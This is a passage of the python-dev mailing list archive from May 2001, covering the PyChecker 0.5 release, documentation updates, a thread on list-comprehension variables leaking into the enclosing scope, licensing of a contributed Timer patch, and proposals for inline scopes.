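    """Count element copies made while appending n items one at a time.

    grow(capacity) returns the new capacity once the buffer is full.
    Worst-case assumption: every resize copies all existing elements.
    """
    capacity = size = copies = 0
    for _ in range(n):
        if size == capacity:
            copies += size            # worst case: realloc moves everything
            capacity = grow(capacity)
        size += 1
    return copies


def fixed_step(capacity):
    # Hypothetical policy: always grow by a constant number of slots.
    return capacity + 10


def proportional(capacity):
    # Hypothetical policy: grow by roughly 1/8 of the current capacity.
    return capacity + capacity // 8 + 6


print(copies_needed(100000, fixed_step))    # grows quadratically with n
print(copies_needed(100000, proportional))  # grows linearly with n
```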

time-for-the-yearly-list.append()-celebration-ly y'rs  - tim


From PyChecker <pychecker@metaslash.com>  Wed May 30 03:49:45 2001
From: PyChecker <pychecker@metaslash.com> (Neal Norwitz)
Date: Tue, 29 May 2001 22:49:45 -0400
Subject: [Python-Dev] PyChecker v0.5 released
Message-ID: <3B145FC9.49813488@metaslash.com>

I was finally able to get version 0.5 out.  Just in case this is the
first time you are seeing this message, or you forgot what PyChecker is:

    PyChecker is a tool for finding common bugs in python source code.
    It finds problems that are typically caught by a compiler for less
    dynamic languages, like C and C++.  Because of the dynamic nature
    of python, some warnings may be incorrect; however,
    spurious warnings should be fairly infrequent.

The highlights are that code at the module scope is now checked.
There is still a problem with class variables and globals that are default
parameter values.  But other than that, there should be no more spurious
Variable unused warnings.

Code that makes PyChecker raise an exception should now be caught in most
cases and this produces a warning.  Please mail me if you find it blowing
up on your code.  The last line processed is shown in the warning, so
if you include some context, I can hopefully fix the problem.

Also, PyChecker should really use the files passed on the command line,
even if it uses the same module name internally.  So it will check your
warn.py, not PyChecker's warn.py.

Feedback, comments, criticisms, new ideas, better ideas, etc. are all 
greatly appreciated.  Thanks to everyone who has taken the time to mail me.
If you can think of common mistakes that are made that PyChecker doesn't
find, please let me know.

Here's the CHANGELOG:
  * Catch internal errors "gracefully" and turn into a warning
  * Add checking of most module scoped code
  * Add pychecker subdir to imports to prevent filename conflicts
  * Don't produce unused local variable warning if variable name == '_'
  * Add -g/--allglobals option to report all global warnings, not just first
  * Add -V/--varlist option to selectively ignore variable not used warnings
  * Add test script and expected results
  * Print all instructions when using debug (-d/--debug)
  * Overhaul internal stack handling so we can look for more problems
  * Fix glob'ing problems (all args after glob were ignored)
  * Fix spurious Base class __init__ not called
  * Fix exception on code like:  ['xxx'].index('xxx')
  * Fix exception on code like:  func(kw=(a < b))
  * Fix line numbers for import statements
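The `'_'` exemption in the changelog is aimed at code like the sketch below, where one half of an unpacked pair is deliberately ignored. The function names are hypothetical, and PyChecker's actual warning text is not reproduced here.

```python
def split_key(item):
    # 'value' is bound but never used: the kind of local an
    # unused-variable checker such as PyChecker reports.
    key, value = item
    return key


def split_key_quiet(item):
    # Naming the ignored slot '_' marks it as unused on purpose, which
    # (per the changelog) PyChecker no longer warns about.
    key, _ = item
    return key
```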

PyChecker is available on SourceForge:
    Web page:           http://pychecker.sourceforge.net/
    Project page:       http://sourceforge.net/projects/pychecker/

Neal
--
pychecker@metaslash.com


From fdrake@cj42289-a.reston1.va.home.com  Wed May 30 06:31:01 2001
From: fdrake@cj42289-a.reston1.va.home.com (Fred Drake)
Date: Wed, 30 May 2001 01:31:01 -0400 (EDT)
Subject: [Python-Dev] [development doc updates]
Message-ID: <20010530053101.4985F28A10@cj42289-a.reston1.va.home.com>

The development version of the documentation has been updated:

	http://python.sourceforge.net/devel-docs/

Incremental update for development version of Python (2.2).

Mostly small updates, but I've worked on new markup for grammar
productions used in the Reference Manual.  Currently, only the lexical
productions in Chapter 2 of the manual have been converted to the new
markup and layout.  Please take a look and send comments to
doc-sig@python.org; the first page containing these changes is at:

    http://python.sourceforge.net/devel-docs/ref/identifiers.html

The changes needed to implement the markup have not been checked in
yet, and there are some bugs in the implementation (both for HTML and
PDF), but this should make the productions easier to navigate.

I've tested the HTML version on Linux only with Mozilla 0.9, Opera
5.0b8, and Netscape Navigator 4.77.  Navigator is definitely lagging
behind in CSS support!

Also added Michel Pelletier's documentation for the HTMLParser module,
with some small changes.


From tim.one@home.com  Wed May 30 06:51:04 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 30 May 2001 01:51:04 -0400
Subject: [Python-Dev] RE: [Doc-SIG] [development doc updates]
In-Reply-To: <20010530053101.4985F28A10@cj42289-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEEIKFAA.tim.one@home.com>

[Fred Drake]
> The development version of the documentation has been updated:
>
> 	http://python.sourceforge.net/devel-docs/
>
> Incremental update for development version of Python (2.2).
>
> Mostly small updates, but I've worked on new markup for grammar
> productions used in the Reference Manual.  Currently, only the lexical
> productions in Chapter 2 of the manual have been converted to the new
> markup and layout.  Please take a look and send comments to
> doc-sig@python.org; the first page containing these changes is at:
>
>     http://python.sourceforge.net/devel-docs/ref/identifiers.html
>
> The changes needed to implement the markup have not been checked in
> yet, and there are some bugs in the implementation (both for HTML and
> PDF), but this should make the productions easier to navigate.

Let me suggest starting with

    http://python.sourceforge.net/devel-docs/ref/integers.html

instead, and clicking on "digit" in the "hexdigit" production.  The problem
with the originally suggested page is that all the links point into the same
paragraph, so "nothing happens" when you click one.  But "digit" was the
cause of a bogus bug report, as the submitter didn't realize "digit" had
been defined earlier in the docs, and without something like these mondo
cool new links it's almost impossible to find cross-section production
definitions.

Stumbled into one glitch:  nonzerodigit doesn't resolve correctly; the
node24.html page it refers to doesn't seem to exist.


From fdrake@acm.org  Wed May 30 06:53:23 2001
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Wed, 30 May 2001 01:53:23 -0400 (EDT)
Subject: [Python-Dev] RE: [Doc-SIG] [development doc updates]
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEEIKFAA.tim.one@home.com>
References: <20010530053101.4985F28A10@cj42289-a.reston1.va.home.com>
 <LNBBLJKPBEHFEDALKOLCKEEIKFAA.tim.one@home.com>
Message-ID: <15124.35539.53551.52668@cj42289-a.reston1.va.home.com>

Tim Peters writes:
 > Stumbled into one glitch:  nonzerodigit doesn't resolve correctly; the
 > node24.html page it refers to doesn't seem to exist.

  That was the bug alluded to.  The digit* grouped with the
nonzerodigit also doesn't work, although the other two uses of digit
on that page (floating.html) work properly.  I'll investigate
tomorrow; just too tired tonight.


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From tim.one@home.com  Wed May 30 08:47:47 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 30 May 2001 03:47:47 -0400
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEENKFAA.tim.one@home.com>

[David Beazley]
> ...
> However, I've also been shooting myself in the foot a little more
> than usual
> ...
> Because of this, I have frequently found myself debugging the
> following programming error:

If "frequently" is "a little more than usual", then it sounds like your
problems in all areas are too common for us to really help you by fixing
this one <wink>.

OK, I'm afraid the behavior follows from taking seriously the idea that
listcomps are syntactic sugar for a specific pattern of nested loops and
"if" tests.  That was done to make it explainable, and the correspondence is
indeed exact.  The implementation already creates "invisible" names:

>>> [repr(name) for name in globals().keys()]
["'__builtins__'", "'__name__'", "'name'", "'__doc__'", "'_[1]'"]
>>>

Where did "_[1]" come from?  You guessed it.  Look for it after the listcomp
finishes and it's gone:

>>> globals().keys()
['__builtins__', '__name__', 'name', '__doc__']
>>>

It's invisible because it's a temp var you *wouldn't* see in the equivalent
loop nest.
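For concreteness, here is a sketch of the loop nest that `[2*x for x in s if x > 0]` corresponds to under this model, written as a Python 3 function. The names `listcomp_as_loops` and `_tmp` are hypothetical; `_tmp` merely plays the part of the hidden `_[1]`, and this is not the compiler's actual output. It assumes `s` is non-empty so that `x` ends up bound.

```python
def listcomp_as_loops(s):
    """Loop-nest equivalent of [2*x for x in s if x > 0] (for-loop model)."""
    _tmp = []              # plays the role of the invisible "_[1]" temporary
    for x in s:            # an ordinary for-loop: binds x in this scope
        if x > 0:
            _tmp.append(2 * x)
    result = _tmp
    del _tmp               # the temporary vanishes once the list is built...
    return result, x       # ...but x is still bound to the last item seen
```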

> ...
> Therefore, I'm wondering if it would make any sense to make the
> iterator variables used inside of a list comprehension private in some
> manner

I'm not sure it's worth losing the exact correspondence with nested loops;
or that it's not worth it either.  Note that "the iterator variables"
needn't be bare names:

>>> class x:
...     pass
...
>>> [1 for x.i in range(3)]
[1, 1, 1]
>>> x.i
2
>>>

This complicates explaining exactly how you want to deviate from the
for-loop model.  So, I think, does this:

>>> [i for i in range(2) for i in range(2, 5)]
[2, 3, 4, 2, 3, 4]
>>>

That is, even in simple cases, is the desired scope attached to the "for" or
to the "[]"?  Python doesn't have a problem with reusing a name as a for
target in nested loops (or in listcomps today).
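Written out as the loop nest it stands for, the doubly bound listcomp above behaves like this (Python 3 syntax; `result` is just a name chosen for the sketch):

```python
# Loop-nest spelling of [i for i in range(2) for i in range(2, 5)].
result = []
for i in range(2):            # outer loop binds i to 0, then 1
    for i in range(2, 5):     # inner loop rebinds the very same name
        result.append(i)

print(result)  # [2, 3, 4, 2, 3, 4]
print(i)       # 4, the last value the inner loop bound
```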

> ...
> Just as an aside, I have never intentionally used the iterator
> variable of a list comprehension after the operation has completed.

Not even in a debugger, when the operation has completed via unexpected
exception, and you're desperate to know what the control vrbl was bound to
at the time of death?  Or in an exception handler?

>>> import sys
>>> try:
...     [i*i for i in xrange(sys.maxint)]
... except OverflowError:
...     raise OverflowError("oops! blew up at %d" % i)
...
Traceback (most recent call last):
  File "<stdin>", line 4, in ?
OverflowError: oops! blew up at 46341
>>>
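The same after-the-fact inspection works with the explicit loop the listcomp stands for. A sketch in Python 3 syntax; `squares_until`, its `limit` parameter, and the use of ValueError are hypothetical stand-ins for whatever the real loop body raises:

```python
def squares_until(limit, values):
    """Square values until one exceeds limit; report where it failed."""
    out = []
    try:
        for i in values:
            sq = i * i
            if sq > limit:
                raise ValueError("too big")
            out.append(sq)
    except ValueError:
        # The loop variable is still bound to the value being processed
        # when the exception was raised.
        return out, i
    return out, None
```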

Or what about:

i = 12
def f():
    print i
    return [i for i in range(i)]
f()

1. Should "print i" print 12, or raise UnboundLocalError?

2. Does the "i" in "range(i)" refer to the global i, or is that just
   senseless?

So long as the for-loop model is followed faithfully, nothing is hard to
explain or predict, simply because there's nothing truly new.
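Following the for-loop model faithfully answers question 1. Because the loop assigns `i` inside `f`, `i` is local to the whole function, so the `print` raises UnboundLocalError. Here is a sketch with the listcomp written as its explicit loop nest (Python 3 syntax; `result` and `outcome` are names chosen for the sketch):

```python
i = 12

def f():
    # The for-loop below assigns i, so i is local to all of f ...
    print(i)                 # ... and this line raises UnboundLocalError.
    result = []
    for i in range(i):       # range(i) would read the same unbound local
        result.append(i)
    return result

outcome = None
try:
    f()
except UnboundLocalError:
    outcome = "UnboundLocalError"
print(outcome)
```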

> I was actually quite surprised with this behavior the first time I saw
> it.

Me too <wink>.

> I suspect most other programmers would not anticipate this side
> effect either.

I share the suspicion, but am not sure why:  "for" is a binding construct in
Python, so being surprised by "for" binding a name is itself surprising.

Another principled model is possible, where

    [f(i) for i in whatever]

is treated like

    (lambda: [f(i) for i in whatever])()

>>> i = 12
>>> (lambda: [i**2 for i in range(4)])()
[0, 1, 4, 9]
>>> i
12
>>>

That's more like Haskell does it.  But the day we explain a Python construct
in terms of a lambda transformation is the day Guido kills all of us <wink>.


From esr@thyrsus.com  Wed May 30 09:00:56 2001
From: esr@thyrsus.com (Eric S. Raymond)
Date: Wed, 30 May 2001 04:00:56 -0400
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEENKFAA.tim.one@home.com>; from tim.one@home.com on Wed, May 30, 2001 at 03:47:47AM -0400
References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu> <LNBBLJKPBEHFEDALKOLCAEENKFAA.tim.one@home.com>
Message-ID: <20010530040056.A27662@thyrsus.com>

Tim Peters <tim.one@home.com>:
> That's more like Haskell does it.  But the day we explain a Python construct
> in terms of a lambda transformation is the day Guido kills all of us <wink>.

They'll get *my* lambdas when they pry them from my cold, dead fingers <wink>,
but I find I don't have a strong opinion about how the scoping should work.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

"Experience should teach us to be most on our guard to protect liberty
when the government's purposes are beneficent...  The greatest dangers
to liberty lurk in insidious encroachment by men of zeal, well meaning
but without understanding."
	-- Supreme Court Justice Louis Brandeis


From thomas@xs4all.net  Wed May 30 12:14:24 2001
From: thomas@xs4all.net (Thomas Wouters)
Date: Wed, 30 May 2001 13:14:24 +0200
Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class for threading
In-Reply-To: <E15525f-0003AG-00@usw-sf-web1.sourceforge.net>; from noreply@sourceforge.net on Wed, May 30, 2001 at 02:16:31AM -0700
References: <E15525f-0003AG-00@usw-sf-web1.sourceforge.net>
Message-ID: <20010530131424.Y690@xs4all.nl>

On Wed, May 30, 2001 at 02:16:31AM -0700, noreply@sourceforge.net wrote:

> OK, I'm un-withdrawing this patch.  Just had to get things
> straight with our lawyer. The patch is released under the
> following license (the X11 license with 4 extra paragraphs
> of disclaimers :):
> http://www.zoteca.com/opensource/LICENSE.txt

This raises an interesting point. Do we want separate pieces of the Python
distribution to have separate licences ? I'd point out that the zoteca
licence isn't mentioned on the OSI site as an Approved Licence, and that the
licence contains a copyright notice, but no clear statement whether it's
allowed to copy the licence other than together with the piece of software
it's distributed with.

The easiest solution would of course be for Itamar to get his boss/lawyers
to give us the right to relicence it under the PSF licence :)

-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From jack@oratrix.nl  Wed May 30 13:26:39 2001
From: jack@oratrix.nl (Jack Jansen)
Date: Wed, 30 May 2001 14:26:39 +0200
Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class
 for threading
In-Reply-To: Message by Thomas Wouters <thomas@xs4all.net> ,
 Wed, 30 May 2001 13:14:24 +0200 , <20010530131424.Y690@xs4all.nl>
Message-ID: <20010530122702.F3FE53B8999@snelboot.oratrix.nl>

> On Wed, May 30, 2001 at 02:16:31AM -0700, noreply@sourceforge.net wrote:
> 
> > OK, I'm un-withdrawing this patch.  Just had to get things
> > straight with our lawyer. The patch is released under the
> > following license (the X11 license with 4 extra paragraphs
> > of disclaimers :):
> > http://www.zoteca.com/opensource/LICENSE.txt
>
> [...]
>
> The easiest solution would of course be for Itamar to get his boss/lawyers
> to give us the right to relicence it under the PSF licence :)

I think this is the only viable solution. If various parts of Python have 
different license agreements this may well be a reason for people not to use 
Python because of the hassle of figuring out which pieces fit their own licensing
policy.
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen@oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm 


From beazley@cs.uchicago.edu  Wed May 30 14:49:29 2001
From: beazley@cs.uchicago.edu (David Beazley)
Date: Wed, 30 May 2001 08:49:29 -0500 (CDT)
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEENKFAA.tim.one@home.com>
References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>
 <LNBBLJKPBEHFEDALKOLCAEENKFAA.tim.one@home.com>
Message-ID: <15124.64105.184857.499019@gargoyle.cs.uchicago.edu>

Tim Peters writes:
 > > Because of this, I have frequently found myself debugging the
 > > following programming error:
 > 
 > If "frequently" is "a little more than usual", then it sounds like your
 > problems in all areas are too common for us to really help you by fixing
 > this one <wink>.

I've probably been bitten by this about 5-10 times over the last few
months. I can also say that it's a real bugger to track down when it
happens.  Now while this may just be a user problem on my part (which
I can accept), I think there is a much deeper semantic problem with
the current implementation of list comprehensions.  Specifically, we
now have this really cool list construction technique that is, for all
practical purposes, an operator.  Yet, at the same time, this
"operator" has a really nasty side-effect of changing the values of
variables in the surrounding scope in a very unnatural and unexpected
way.

More generally, it's essentially the same behavior that you would get
if you wrote some code like this:

    a = expr(x,y)

and expr() went off and nuked the value of x, replacing it with
something completely different (note: I'm not talking about cases
where x might be mutable here).  Since you can write things like this

    a = [ 2*x for x in s]

it's easy to view the right hand side as being isolated in the same
way as a normal expression (where the name of the iteration variable
"x" is incidental--a throwaway if you will).

Maybe everyone else views list comprehensions as a series of
statements (the syntactic sugar for nested for-loop idea).  However,
if you look at how they can be used, it's completely different than
this.  Specifically, if I write something like this:

   a = [2*x for x in s] + [3*x for x in t]

I certainly don't conceptualize it as being literally expanded into
the following sequence of statements:

   t1 = [ ]
   for x in s:
      t1.append(2*x)
   t2 = [ ]
   for x in t:
      t2.append(3*x)
   a = t1 + t2

 > 
 > I'm not sure it's worth losing the exact correspondence with nested loops;
 > or that it's not worth it either.  Note that "the iterator variables"
 > needn't be bare names:
 > 
 > >>> class x:
 > ...     pass
 > ...
 > >>> [1 for x.i in range(3)]
 > [1, 1, 1]
 > >>> x.i
 > 2
 > >>>
 > 

Hmmm. I didn't realize that you could even do this.    Yes, this would
definitely present a problem.   However, if list comprehensions were
modified not to assign any names in the current scope, it still
seems like this would work (in this case, "x" is already defined and
"x.i" is not creating a new name, but is setting an attribute on
something else).   Couldn't nested scopes be used to implement this
in some manner?

 > > ...
 > > Just as an aside, I have never intentionally used the iterator
 > > variable of a list comprehension after the operation has completed.
 > 
 > Not even in a debugger, when the operation has completed via unexpected
 > exception, and you're desperate to know what the control vrbl was bound to
 > at the time of death?  Or in an exception handler?
 > 

Nope.  I don't make programming mistakes---well, other than this one,
and well, all of those other ones :-).

 > Another principled model is possible, where
 > 
 >     [f(i) for i in whatever]
 > 
 > is treated like
 > 
 >     (lambda: [f(i) for i in whatever])()
 > 
 > >>> i = 12
 > >>> (lambda: [i**2 for i in range(4)])()
 > [0, 1, 4, 9]
 > >>> i
 > 12
 > >>>
 > 
 > That's more like Haskell does it.  But the day we explain a Python construct
 > in terms of a lambda transformation is the day Guido kills all of us <wink>.

Ah yes, well this is exactly the kind of behavior that seems most
natural to me.   It's also the behavior that everyone expected when I
went around to the various Python hackers in the department and asked
them about it yesterday.

I suppose I could just write this:

  a = (lambda s: [2*i for i in s])(s)

However, that's pretty ugly.

In any case, I'm mostly just curious if anyone else has been bitten by
the problem I've described.  I would certainly love to see a fix for
it (I would even volunteer to work on a prototype implementation if
there is interest). On the other hand, if no changes are deemed
necessary, we should at least try to better emphasize this behavior in the
documentation--perhaps encouraging people to use private names.  For
example:

   a = [_i*2 for _i in t]
   
(although, I have to say that this just looks like a gross hack--I'd
rather not have to resort to doing this).

Cheers,

Dave


From fdrake@acm.org  Wed May 30 15:03:13 2001
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Wed, 30 May 2001 10:03:13 -0400 (EDT)
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <15124.64105.184857.499019@gargoyle.cs.uchicago.edu>
References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>
 <LNBBLJKPBEHFEDALKOLCAEENKFAA.tim.one@home.com>
 <15124.64105.184857.499019@gargoyle.cs.uchicago.edu>
Message-ID: <15124.64929.215666.745913@cj42289-a.reston1.va.home.com>

David Beazley writes:
 > Maybe everyone else views list comprehensions as a series of
 > statements (the syntactic sugar for nested for-loop idea).  However,

  I certainly don't.  I know that that was used as part of the design
consideration, but it's not at all clear to me that this is
desirable.
  If I see code like this:

        x = 42
        L = [x**2 for x in range(2000)]
        print x

I think it should map to something like this from C++:

        int x = 42;
        int L[2000];

        for (int x = 0; x < 2000; ++x) {
            L[x] = x * x;
        }
        printf("%d\n", x);

i.e., both *should* print "42\n" on standard output.

Tim sez:
 > I'm not sure it's worth losing the exact correspondence with nested loops;
 > or that it's not worth it either.  Note that "the iterator variables"
 > needn't be bare names:
 > 
 > >>> class x:
 > ...     pass
 > ...
 > >>> [1 for x.i in range(3)]
 > [1, 1, 1]
 > >>> x.i
 > 2

David:
 > Hmmm. I didn't realize that you could even do this.    Yes, this would
 > definitely present a problem.   However, if list comprehensions were

  I didn't realize this either.  I'm quite surprised by it, in fact,
though I understand (I think) why it works that way.  But was this
intentional?  It seems like pure evil to me!  I'd only expect it to
support bare names and sequence unpacking (with only bare names at the
"edge" of all nested unpackings).


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From gward@python.net  Wed May 30 15:36:30 2001
From: gward@python.net (Greg Ward)
Date: Wed, 30 May 2001 10:36:30 -0400
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <15124.64105.184857.499019@gargoyle.cs.uchicago.edu>; from beazley@cs.uchicago.edu on Wed, May 30, 2001 at 08:49:29AM -0500
References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu> <LNBBLJKPBEHFEDALKOLCAEENKFAA.tim.one@home.com> <15124.64105.184857.499019@gargoyle.cs.uchicago.edu>
Message-ID: <20010530103630.B11580@gerg.ca>

On 30 May 2001, David Beazley said:
> In any case, I'm mostly just curious if anyone else has been bitten by
> the problem I've described.

For the record, I have not been bitten by this, but I probably don't use
list comps as much as you do.

I can completely sympathize with both your and Tim's point of view
here.  Both make perfect sense at the same time.  Hmmm.

"Do I contradict myself?
 Very well then I contradict myself,
 (I am large, I contain multitudes)"

        Greg
-- 
Greg Ward - Unix nerd                                   gward@python.net
http://starship.python.net/~gward/
Money is a powerful aphrodisiac.  But flowers work almost as well.


From barry@digicool.com  Wed May 30 16:07:12 2001
From: barry@digicool.com (Barry A. Warsaw)
Date: Wed, 30 May 2001 11:07:12 -0400
Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class
 for threading
References: <thomas@xs4all.net>
 <20010530131424.Y690@xs4all.nl>
 <20010530122702.F3FE53B8999@snelboot.oratrix.nl>
Message-ID: <15125.3232.925401.563151@anthem.wooz.org>

>>>>> "TW" == Thomas Wouters <thomas@xs4all.net> writes:

    TW> The easiest solution would of course be for Itamar to get his
    TW> boss/lawyers to give us the right to relicence it under the
    TW> PSF licence :)

>>>>> "JJ" == Jack Jansen <jack@oratrix.nl> writes:

    JJ> I think this is the only viable solution. If various parts of
    JJ> Python have different license agreements this may well be a
    JJ> reason for people not to use Python because of the hassle of
    JJ> figuring out which pieces fit their own licensing policy.

I completely agree.  IMO, the most important job of the PSF is to make
the Python IP sane again.  That means clearing as much of the existing
rights as possible, and releasing it under the NAIPL (New And Improved
Python License).  Any code that is licensed differently could mean
that it'll be ripped out of some re-distributions.  I'd be less
concerned about some ancillary module that few people use, and much
more concerned about some core piece of the code.

-Barry


From mal@lemburg.com  Wed May 30 20:57:17 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Wed, 30 May 2001 21:57:17 +0200
Subject: [Python-Dev] Autoconf problems on BeOS
Message-ID: <3B15509D.C790D5DF@lemburg.com>

I have a bug report assigned to myself which really is more
about autoconf than Unicode. The problem is that the
SIZEOF_xxx tests cause the Metrowerks compiler on BeOS to
fail, which in turn causes these defines to be set to 0!

Could someone with more autoconf experience please have a look ?

https://sourceforge.net/tracker/?func=detail&aid=420416&group_id=5470&atid=105470

Thanks,
-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From tim.one@home.com  Wed May 30 21:07:37 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 30 May 2001 16:07:37 -0400
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <15124.64929.215666.745913@cj42289-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEGOKFAA.tim.one@home.com>

[Tim]
> Note that "the iterator variables" needn't be bare names:

[Fred]
>   I didn't realize this either.

You have to get your head out of the docs and read more code <wink>.

> I'm quite surprised by it, in fact, though I understand (I think) why
> it works that way.  But was this intentional?

I expect so.

> It seems like pure evil to me!

Sometimes it's the bee's knees; for example,

>>> digits = range(3)
>>> x = [None] * 3
>>> base3 = [x[:] for x[0] in digits for x[1] in digits for x[2] in digits]
>>> base3
[[0, 0, 0], [0, 0, 1], [0, 0, 2],
 [0, 1, 0], [0, 1, 1], [0, 1, 2],
 [0, 2, 0], [0, 2, 1], [0, 2, 2],
 [1, 0, 0], [1, 0, 1], [1, 0, 2],
 [1, 1, 0], [1, 1, 1], [1, 1, 2],
 [1, 2, 0], [1, 2, 1], [1, 2, 2],
 [2, 0, 0], [2, 0, 1], [2, 0, 2],
 [2, 1, 0], [2, 1, 1], [2, 1, 2],
 [2, 2, 0], [2, 2, 1], [2, 2, 2]]
>>>

I've done stuff "like that" often, albeit via the nested-loop spelling.
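For comparison, that nested-loop spelling of the base3 example looks like this (a sketch in Python 3 syntax; it builds the same 27 lists in the same order):

```python
# Nested-loop spelling of the base3 listcomp: the loop targets are
# list items, so each pass writes straight into x.
digits = range(3)
x = [None] * 3
base3 = []
for x[0] in digits:
    for x[1] in digits:
        for x[2] in digits:
            base3.append(x[:])   # copy, since x keeps being overwritten
```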

> I'd only expect it to support bare names and sequence unpacking (with
> only bare names at the "edge" of all nested unpackings).

It's too late to take it away now!  Python always worked this way.  And it's
really got nothing to do with implementing what David wants (e.g., the
lambda transformation I mentioned preserves its semantics) -- apart from (I
hope) driving home that changes need to be considered very carefully.


From tim.one@home.com  Wed May 30 21:22:19 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 30 May 2001 16:22:19 -0400
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <15124.64105.184857.499019@gargoyle.cs.uchicago.edu>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEGPKFAA.tim.one@home.com>

[David Beazley, pretty much repeats why he doesn't like the current scheme]

I hoped it was clear the first time I was at least half sympathetic!  If it
wasn't, I am <wink>.

>> >>> i = 12
>> >>> (lambda: [i**2 for i in range(4)])()
>> [0, 1, 4, 9]
>> >>> i
>> 12
>> >>>
>>
>> That's more like Haskell does it.

> Ah yes, well this is exactly the kind of behavior that seems most
> natural to me.   It's also the behavior that everyone expected when I
> went around to the various Python hackers in the department and asked
> them about it yesterday.

I believe that.

> I suppose I could just write this:
>
>   a = (lambda s: [2*i for i in s])(s)
>
> However, that's pretty ugly.

It's too complicated, isn't it?  In the presence of nested scopes (which are
reality in 2.2),

    a = (lambda: [2*i for i in s])()

does the same thing and is conceptually clearer.  I'm not suggesting that
you actually write that, but view it as a *model* for your intended
semantics.  I wouldn't want to see the implementation actually use a lambda
under the covers, either, but we need some crisp way to explain the intent.
Note that the lambda-trick *model* "does the right thing" for for-loop
targets like x.i and x[i] too.
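The claim that the lambda model still handles targets like x.i can be checked with a nested function standing in for the lambda. A sketch in Python 3 syntax; the names `Box`, `box`, `squares_in_own_scope`, and `ones_via_attr` are hypothetical:

```python
class Box:
    pass

box = Box()
i = 12

def squares_in_own_scope(seq):
    # Stand-in for (lambda: [i**2 for i in seq])(): the loop runs in
    # body()'s scope, so its bare-name target i is local to body().
    def body():
        out = []
        for i in seq:
            out.append(i ** 2)
        return out
    return body()

def ones_via_attr(seq):
    # An attribute target is not a new name: it still sets box.i on the
    # outer object, exactly as the plain for-loop would.
    def body():
        out = []
        for box.i in seq:
            out.append(1)
        return out
    return body()

print(squares_in_own_scope(range(4)), i)   # [0, 1, 4, 9] 12
print(ones_via_attr(range(3)), box.i)      # [1, 1, 1] 2
```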

> In any case, I'm mostly just curious if anyone else has been bitten by
> the problem I've described.  I would certainly love to see a fix for
> it (I would even volunteer to work on a prototype implementation if
> there is interest).

I encourage that, but since it's not 100% backward-compatible you'll enjoy
the usual range of hysterical <wink> opposition.  Needs a PEP, and possibly
even an associated future-statement.  Overall, I'm more in favor of changing
it than not.


From skip@pobox.com (Skip Montanaro)  Wed May 30 21:48:47 2001
From: skip@pobox.com (Skip Montanaro)
Date: Wed, 30 May 2001 15:48:47 -0500
Subject: [Python-Dev] scoping and list comprehensions
Message-ID: <15125.23727.168431.762320@beluga.mojam.com>

Regarding the issue of how list comprehensions should relate to their
environment, perhaps instead of modifying list comprehensions to make them
execute in new local scopes (or at least appear to), a better solution would
be to allow a new local scope to be introduced inline, sort of like in C:

    {
        int i;
        for (i=0; i < 10; i++) {
            dostuffwith(i);
        }
    }

While this might be used more for list comprehensions than other constructs,
I'm sure people will find a way to (ab)use it for other things as well.  I
don't see an obvious way of adding such functionality to Python without
introducing a new keyword though, which is going to make it difficult to get
past Guido:

    l = []
    scope:
        l = [i**2 for i in range(10)]
    print l

Hmmm, wait a minute, what if you terminated a block introducer (if or while
clause or try/except clauses) with something other than a colon?  (I'm just
thinking out loud, I don't think this is necessarily a good solution).

    if 1:		# no new scope introduced
        l = [i**2 for i in range(10)]
    print l

vs.

    if 1;		# new scope introduced for enclosed block
        l = [i**2 for i in range(10)]
    print l

That certainly has some line noise qualities about it, especially since
colons and semicolons are visually so similar, but does offer an alternative
to introducing a new keyword into the language.

Hmmm, wait another minute, perhaps you could simply overload def:

    l = []
    def:
        l = [i**2 for i in range(10)]
    print l

There's also the problem of how to export results from the scope, though
perhaps the new nested scope stuff provides a solution to that.  (I've
ignored them so far, so I can't tell...)

Would it be possible for the compiler to recognize the degenerate def: and
simply mangle any names that would clash instead of introducing an actual
new execution frame?  The above might be equivalent to

    l = []
    l = [__mangled_i**2 for __mangled_i in range(10)]
    print l

if 'i' already existed in the same scope.

Just thinking out loud.  I'm not sure any of these ideas is any better than
the current state of affairs.

Skip


From Greg.Wilson@baltimore.com  Wed May 30 22:11:16 2001
From: Greg.Wilson@baltimore.com (Greg Wilson)
Date: Wed, 30 May 2001 17:11:16 -0400
Subject: [Python-Dev] %b format?
